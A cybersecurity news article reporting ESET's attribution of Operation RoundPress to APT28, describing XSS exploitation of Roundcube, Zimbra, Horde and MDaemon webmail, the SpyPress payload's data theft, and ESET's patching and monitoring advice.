A Russia-linked threat actor, known as APT28, has been attributed to a cyber espionage campaign targeting webmail servers through cross-site scripting (XSS) vulnerabilities, including a zero-day in MDaemon, according to new findings by cybersecurity firm ESET.
The campaign, dubbed Operation RoundPress, began in 2023 and targets widely used webmail platforms like Roundcube, Horde, MDaemon, and Zimbra. ESET links the operation with medium confidence to APT28—a group known by many aliases including Fancy Bear, Sednit, Forest Blizzard, and TA422.
“The ultimate goal is to steal confidential data from specific email accounts,” said ESET researcher Matthieu Faou. While most of the 2024 targets have been Ukrainian governmental entities and defense contractors in Bulgaria and Romania, the campaign has also reached organizations in Greece, Serbia, Cyprus, Cameroon, Ecuador, and beyond.
APT28’s Webmail Exploits Include Zero-Day and Known CVEs
The attacks exploit XSS vulnerabilities in multiple email platforms to execute malicious JavaScript code via HTML content embedded in email messages. These flaws allow access to victim inboxes—without persistent malware—so long as the user opens the message through the webmail interface.
Here’s a breakdown of the targeted vulnerabilities:
- Roundcube: [CVE-2023-43770], previously documented and added to CISA’s KEV catalog
- Zimbra: [CVE-2024-27443], known and patched
- Horde: Exploited via an old flaw patched in 2007
- MDaemon: Exploited via a zero-day now assigned [CVE-2024-11182] (CVSS 5.3), patched in version 24.5.1 (November 2024)
ESET confirmed that APT28 weaponized these vulnerabilities by sending crafted HTML emails containing hidden JavaScript—code not visible to the recipient. Once the email is opened, a payload called SpyPress executes in the background, harvesting:
- Email credentials
- Inbox content and contact lists
- 2FA codes and login history
- In some cases, new mailbox rules and application passwords
One variant, SpyPress.ROUNDCUBE, creates Sieve rules in Roundcube to automatically forward all incoming emails to an attacker-controlled address—ensuring long-term access even after the malicious email is deleted.
Notably, the malware lacks persistence; it only runs when the email is reopened. Still, ESET warns that its ability to retrigger and re-exfiltrate data makes it an effective and stealthy espionage tool.
Why Webmail Platforms Are Prime Targets
APT28 and other groups such as Winter Vivern and GreenCube (UNC3707) have increasingly focused on webmail platforms over the past two years. These services are often under-maintained, vulnerable to remote HTML-based exploitation, and used by government, military, and academic institutions.
Faou noted, “Many organizations don’t regularly update webmail servers, and because XSS payloads can be delivered via email, it’s very convenient for attackers to use them for targeted espionage and email theft.”
Given the cross-border scope and advanced tactics of APT28 webmail XSS attacks, ESET is urging system administrators to patch vulnerable mail systems, audit custom Sieve rules, and implement enhanced monitoring for suspicious webmail activity.
